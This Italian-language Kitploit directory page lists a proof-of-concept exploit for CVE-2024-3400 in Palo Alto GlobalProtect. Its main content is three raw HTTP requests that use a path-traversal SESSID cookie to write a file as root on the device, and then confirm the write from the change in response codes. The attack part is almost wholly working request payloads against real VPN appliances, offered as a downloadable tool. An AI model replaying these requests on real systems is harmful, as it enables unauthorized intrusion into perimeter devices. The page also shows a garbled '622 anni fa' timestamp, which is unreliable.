Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3400-Palo-Alto-OS-Command-Injection — Exploit proof-of-concept per CVE-2024-3400, una vulnerabilità di iniezione di comandi in Palo Alto GlobalProtect, che dimostra il caricamento e la verifica di file tramite richieste HTTP appositamente create. | Kitploit
Strumenti/GitHubGitHub/0xr2r/cve-2024-3400-palo-alto-os-command-injection
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHub0xr2r/cve-2024-3400-palo-alto-os-command-injection

CVE-2024-3400-Palo-Alto-OS-Command-Injection

Exploit proof-of-concept per CVE-2024-3400, una vulnerabilità di iniezione di comandi in Palo Alto GlobalProtect, che dimostra il caricamento e la verifica di file tramite richieste HTTP appositamente create.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
622 anni faNon ancora revisionato

#Passaggi :


#1. Verificare se il file (0xr2r.txt) è presente sul dispositivo eseguendo la seguente richiesta GET oppure possiamo verificarlo aprendo

https://domain.com/global-protect/portal/images/0xr2r.txt URL nel browser se ricevi una risposta 404 significa che il file non è presente.


root@kitploit:~


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

#2. ora inserisci il file (0xr2r.txt) sul dispositivo eseguendo la seguente richiesta POST. Questo creerà il file sul dispositivo nel percorso indicato con accesso root.


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r


#3. ora se provi ad accedere nuovamente ai file dovresti ricevere 403 invece di 404. questo dimostra che il file (0xr2r.txt) è presente sul dispositivo con accesso root.


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
Scarica lo strumento